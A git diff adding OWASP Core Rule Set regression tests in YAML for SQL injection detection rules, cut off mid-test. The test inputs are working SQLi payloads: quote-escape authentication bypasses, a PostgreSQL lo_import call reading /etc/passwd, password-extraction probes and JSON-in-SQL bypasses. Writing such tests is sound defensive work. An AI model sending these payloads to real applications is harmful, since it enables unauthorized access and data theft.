.....%60..%60%22%21%21%21%22%22%27...%27%40%40%40%40%27.....%27%21%21%21%60...%27.%22%21%21%21%21%21%27%21%27%21%21%21%22%40%27.....%27%21%21%21%21%22%40%27...%27%21%21%27%40%40%22%40%40%40%40%40%60..%27%21%27.....%22%22%21%21%21%21%21%27%40%40%40%40%22%40%40%40%60.....%60%21%21%21%21%21%27....%27%27%40%40%40%40%27.....%27%21%60....%22...%22%21%21%21%21%27%21%21%22%40%27%40%40%40%40%40%27%21%21%21%22%21%21%21%21%27%21%21%21%21%60%27%27..%22%22%21%21%21%27%22%21%60..%22%27%27%60..%22%21%22%21%21%21%21%21%27..%27..%27.%27%27%21%21%21%21%60%27%21%21%21%21%60..%27%21%21%22.....%22%21%21%21%21%27%21%21%21%27....%60.....%22...%22%22%22.%22%27.%60%21%21%21%21%22%60%40%22.....%27%21%21%21%21%22%40%60...%22.%22.....%27%27..%22%27%21%21%21%21%21%60....%22%21%21%21%22..%60%21%21%21%21%60%21%21%21%21%27....%60%27%40%40%40%22%27.%27....%22%40%40%40%60%21%21%21%21%22%40%40%40%40%40%27%21%21%21%60%40%40%40%40%60.%22..%22%40%40%22%21%60%22%21%21%21%21%27%27%27.%27%22%40%40%40%22%40%40%40%27....%22%21%21%21%21%21%22%21%21%21%21%22%21%27%60%27%21%21%21%60%21%27...%60%21%21%21%21%27...%27%40%40%40%40%40%60%21%21%60%21%21%21%22%40%60%40%40%40%40%40%60%27%60..%22%22%21%21%27%22%40%40%27...%22..%22....%22%27%60%40%40%27....%27%40%40%40%40%22%60%21%21%60.%60%40%27%21%60%21%22...%27...%27.....%27%21%21%22..%22%22%40%27%21%21%21%27%40%40%22.%27%21%21%21%60%40%60%60%21%21%21%60%21%21%22...%27.%22%21%21%21%27...%22%21%21%21%21%60%40%40%40%40%60%22.%27%21%21%60.....%60%21%21%60%21%21%21%21%21%27.%27%40%40%40%40%40%22%21%21%21%60..%27%21%21%21%21%21%27%21%21%60%40%40%27%21%21%21%27.%22%21%21%21%21%22.%22%40%40%40%40%40%22%21%21%21%22%21%21%22%22%21%21%21%60%27%21%21%60%40%40%40%40%40%27..%27%40%60.....%22%21%21%21%27.%27%21%21%21%21%27%27....%22%40%40%27%40%40%40%40%40%60%60or" + version: HTTP/1.0 + output: + log_contains: id "942521" + - test_title: 942521-18 + desc: "Performance test" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + data: "var='.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'or" + version: HTTP/1.0 + output: + log_contains: id "942521" + - test_title: 942521-19 + desc: "Negative test: performance test" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + data: "var=.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'or" + version: HTTP/1.0 + output: + no_log_contains: id "942521" + - test_title: 942521-20 + desc: "Detect admin%40juice-sh.op'and%20likely%20(id)--" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + data: "admin%2540juice-sh.op%5C%27and%2520likely%2520%28id%29--" + version: HTTP/1.0 + output: + log_contains: id "942521" + - test_title: 942521-21 + desc: "Detects odd number of quotes in request headers" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "1' and starts_with(password) and 'true" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + version: HTTP/1.0 + output: + log_contains: id "942521" + - test_title: 942521-22 + desc: "Detects odd number of quotes in request headers" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "1' and lo_import('/etc' || '/pass' || 'wd')::int::bool and 'true" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + version: HTTP/1.0 + output: + log_contains: id "942521" + - test_title: 942521-23 + desc: "Detects odd number of quotes in request headers" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "1' and lo_get(16400)::text::bool and 'true" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + version: HTTP/1.0 + output: + log_contains: id "942521" + - test_title: 942521-24 + desc: "Detects odd number of quotes in request headers" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "1'and json_search (json_array(password),0b11000010110110001101100,'t_______________')#" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + version: HTTP/1.0 + output: + log_contains: id "942521" diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942522.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942522.yaml new file mode 100644 index 0000000000..92b5699162 --- /dev/null +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942522.yaml @@ -0,0 +1,154 @@ +--- +meta: + author: "terjanq, Franziska Bühler" + description: "Detects basic SQL authentication bypass attempts 4.1/4" + enabled: true + name: 942522.yaml +tests: + - test_title: 942522-1 + desc: "Blocks bypass with escaped quotes" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + # \'or'1 + data: "var=%5C'or'1" + version: HTTP/1.0 + output: + log_contains: id "942522" + - test_title: 942522-2 + desc: "Blocks bypass with escaped quotes" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + # \"or"1 + data: "var=%5C%22or%221" + version: HTTP/1.0 + output: + log_contains: id "942522" + - test_title: 942522-3 + desc: "Blocks bypass with escaped quotes" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + # \`or`1 + data: "var=%5C%60or%601" + version: HTTP/1.0 + output: + log_contains: id "942522" + - test_title: 942522-4 + desc: "Blocks bypass with: \\'and" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + data: "var=%5C'and" + version: HTTP/1.0 + output: + log_contains: id "942522" + - test_title: 942522-5 + desc: "Negative test: doesn't block normal SQLi" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + data: "var='or'1" + version: HTTP/1.0 + output: + no_log_contains: id "942522" + - test_title: 942522-6 + desc: "Negative test: doesn't block escaped quotes without following (and|or)" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + data: "var=%5C' foo or" + version: HTTP/1.0 + output: + no_log_contains: id "942522" + - test_title: 942522-7 + desc: "New line bypass" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + data: "var=newline%0A%5C' and 1" + version: HTTP/1.0 + output: + log_contains: id "942522" + - test_title: 942522-8 + desc: "Negative test: Wikipedia article about SQLi" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + data: "var=Incorrectly%20constructed%20SQL%20statements%0AThis%20form%20of%20injection%20relies%20on%20the%20fact%20that%20SQL%20statements%20consist%20of%20both%20data%20used%20by%20the%20SQL%20statement%20and%20commands%20that%20control%20how%20the%20SQL%20statement%20is%20executed.%20For%20example%2C%20in%20the%20SQL%20statement%20select%20*%20from%20person%20where%20name%20%3D%20'susan'%20and%20age%20%3D%202%20the%20string%20'susan'%20is%20data%20and%20the%20fragment%20and%20age%20%3D%202%20is%20an%20example%20of%20a%20command%20(the%20value%202%20is%20also%20data%20in%20this%20example).%0A%0ASQL%20injection%20occurs%20when%20specially%20crafted%20user%20input%20is%20processed%20by%20the%20receiving%20program%20in%20a%20way%20that%20allows%20the%20input%20to%20exit%20a%20data%20context%20and%20enter%20a%20command%20context.%20This%20allows%20the%20attacker%20to%20alter%20the%20structure%20of%20the%20SQL%20statement%20which%20is%20executed.%0A%0AAs%20a%20simple%20example%2C%20imagine%20that%20the%20data%20'susan'%20in%20the%20above%20statement%20was%20provided%20by%20user%20input.%20The%20user%20entered%20the%20string%20'susan'%20(without%20the%20apostrophes)%20in%20a%20web%20form%20text%20entry%20field%2C%20and%20the%20program%20used%20string%20concatenation%20statements%20to%20form%20the%20above%20SQL%20statement%20from%20the%20three%20fragments%20select%20*%20from%20person%20where%20name%3D'%2C%20the%20user%20input%20of%20'susan'%2C%20and%20'%20and%20age%20%3D%202.%0A%0ANow%20imagine%20that%20instead%20of%20entering%20'susan'%20the%20attacker%20entered%20'%20or%201%3D1%3B%20--.%0A%0AThe%20program%20will%20use%20the%20same%20string%20concatenation%20approach%20with%20the%203%20fragments%20of%20select%20*%20from%20person%20where%20name%3D'%2C%20the%20user%20input%20of%20'%20or%201%3D1%3B%20--%2C%20and%20'%20and%20age%20%3D%202%20and%20construct%20the%20statement%20select%20*%20from%20person%20where%20name%3D''%20or%201%3D1%3B%20--%20and%20age%20%3D%202.%20Many%20databases%20will%20ignore%20the%20text%20after%20the%20'--'%20string%20as%20this%20denotes%20a%20comment.%20The%20structure%20of%20the%20SQL%20command%20is%20now%20select%20*%20from%20person%20where%20name%3D''%20or%201%3D1%3B%20and%20this%20will%20select%20all%20person%20rows%20rather%20than%20just%20those%20named%20'susan'%20whose%20age%20is%202.%20The%20attacker%20has%20managed%20to%20craft%20a%20data%20string%20which%20exits%20the%20data%20context%20and%20entered%20a%20command%20context.%0A%0AA%20more%20complex%20example%20is%20now%20presented.%0A%0AImagine%20a%20program%20creates%20a%20SQL%20statement%20using%20the%20following%20string%20assignment%20command%20%3A%0A%0Avar%20statement%20%3D%20%22SELECT%20*%20FROM%20users%20WHERE%20name%20%3D%20'%22%20%2B%20userName%20%2B%20%22'%22%3B%0A%0AThis%20SQL%20code%20is%20designed%20to%20pull%20up%20the%20records%20of%20the%20specified%20username%20from%20its%20table%20of%20users.%20However%2C%20if%20the%20%22userName%22%20variable%20is%20crafted%20in%20a%20specific%20way%20by%20a%20malicious%20user%2C%20the%20SQL%20statement%20may%20do%20more%20than%20the%20code%20author%20intended.%20For%20example%2C%20setting%20the%20%22userName%22%20variable%20as%3A%0A%0A'%20OR%20'1'%3D'1%0Aor%20using%20comments%20to%20even%20block%20the%20rest%20of%20the%20query%20(there%20are%20three%20types%20of%20SQL%20comments%5B14%5D).%20All%20three%20lines%20have%20a%20space%20at%20the%20end%3A%0A%0A'%20OR%20'1'%3D'1'%20--%0A'%20OR%20'1'%3D'1'%20%7B%0A'%20OR%20'1'%3D'1'%20%2F*%20" + version: HTTP/1.0 + output: + no_log_contains: id "942522" + - test_title: 942522-9 + desc: "Detect admin%40juice-sh.op'and%20likely%20(id)--" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + data: "admin%2540juice-sh.op%5C%27and%2520likely%2520%28id%29--" + version: HTTP/1.0 + output: + log_contains: id "942522" diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942530.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942530.yaml new file mode 100644 index 0000000000..63a3993ca7 --- /dev/null +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942530.yaml @@ -0,0 +1,23 @@ +--- +meta: + author: "Franziska Bühler" + description: "Detects SQL query termination" + enabled: true + name: 942530.yaml +tests: + - test_title: 942530-1 + desc: "Detects SQL query termination with ';" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + data: "email=admin@juice-sh.op';&password=foo" + version: HTTP/1.0 + output: + log_contains: id "942530" diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942540.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942540.yaml new file mode 100644 index 0000000000..f4b72dab2d --- /dev/null +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942540.yaml @@ -0,0 +1,135 @@ +--- +meta: + author: "karelorigin, Walter Hop" + description: Various Authentication bypass tests + enabled: true + name: 942540.yaml +tests: + - test_title: 942540-1 + desc: "Positive test for single quotes" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "email=admin%40juice-sh.op';" + version: HTTP/1.0 + output: + log_contains: id "942540" + - test_title: 942540-2 + desc: "Positive test for double quotes" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "email=admin%40juice-sh.op\";" + version: HTTP/1.0 + output: + log_contains: id "942540" + - test_title: 942540-3 + desc: "Positive test for backticks" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "email=admin%40juice-sh.op`;" + version: HTTP/1.0 + output: + log_contains: id "942540" + - test_title: 942540-4 + desc: "False positive test CSV balanced single quotes" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "email='foo';'bar';'def'" + version: HTTP/1.0 + output: + no_log_contains: id "942540" + - test_title: 942540-5 + desc: "False positive test balanced backticks" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "email=`foo`;`bar`;`def`" + version: HTTP/1.0 + output: + no_log_contains: id "942540" + - test_title: 942540-6 + desc: "False positive test (markdown) mixed and balanced quotes" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Content-Type: "multipart/form-data; boundary=--------397236876" + method: POST + port: 80 + uri: "/" + data: | + ----------397236876 + Content-Disposition: form-data; name="document"; filename="document.md" + Content-Type: text/markdown + + # Foo + my name is 'foo'; and I work on CRS. + # Bar + my name is "bar"; and I work on CRS. + ----------397236876-- + output: + no_log_contains: id "942540" + - test_title: 942540-7 + desc: "Test for bypass with comment" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "email=root%40example.com%27%2F%2A%20comment%20%2A%2F%3B" + version: HTTP/1.0 + output: + log_contains: id "942540" diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942550.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942550.yaml new file mode 100644 index 0000000000..f7f9546701 --- /dev/null +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942550.yaml @@ -0,0 +1,673 @@ +--- +meta: + author: "Andrea Menin (theMiddle)" + description: JSON in SQL bypass technique + enabled: true + name: 942550.yaml +tests: + - test_title: 942550-1 + desc: | + JSON in SQL (ARGS) + decoded payload: OR '{"b":2}'::jsonb <@ '{"a":1, "b":2}'::jsonb + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "id=OR%20%27%7B%22b%22%3A2%7D%27%3A%3Ajsonb%20%3C%40%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27%3A%3Ajsonb" + version: HTTP/1.0 + output: + log_contains: id "942550" + - test_title: 942550-2 + desc: | + JSON in SQL (REQUEST_FILENAME) + decoded payload: OR '{"b":2}'::jsonb <@ '{"a":1, "b":2}'::jsonb + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/OR%20%27%7B%22b%22%3A2%7D%27%3A%3Ajsonb%20%3C%40%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27%3A%3Ajsonb" + version: HTTP/1.0 + output: + log_contains: id "942550" + - test_title: 942550-3 + desc: | + JSON in SQL (ARGS) + decoded payload: OR '{"b":2}'::jsonb <@ '{"a":1, "b":2}' + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "id=OR%20%27%7B%22b%22%3A2%7D%27%3A%3Ajsonb%20%3C%40%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27" + version: HTTP/1.0 + output: + log_contains: id "942550" + - test_title: 942550-4 + desc: | + JSON in SQL (REQUEST_FILENAME) + decoded payload: OR '{"b":2}'::jsonb <@ '{"a":1, "b":2}' + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/OR%20%27%7B%22b%22%3A2%7D%27%3A%3Ajsonb%20%3C%40%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27" + version: HTTP/1.0 + output: + log_contains: id "942550" + - test_title: 942550-5 + desc: | + JSON in SQL (ARGS) + decoded payload: OR '{"b":2}' <@ '{"a":1, "b":2}'::jsonb + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "id=OR%20%27%7B%22b%22%3A2%7D%27%20%3C%40%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27%3A%3Ajsonb" + version: HTTP/1.0 + output: + log_contains: id "942550" + - test_title: 942550-6 + desc: | + JSON in SQL (REQUEST_FILENAME) + decoded payload: OR '{"b":2}' <@ '{"a":1, "b":2}'::jsonb + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: 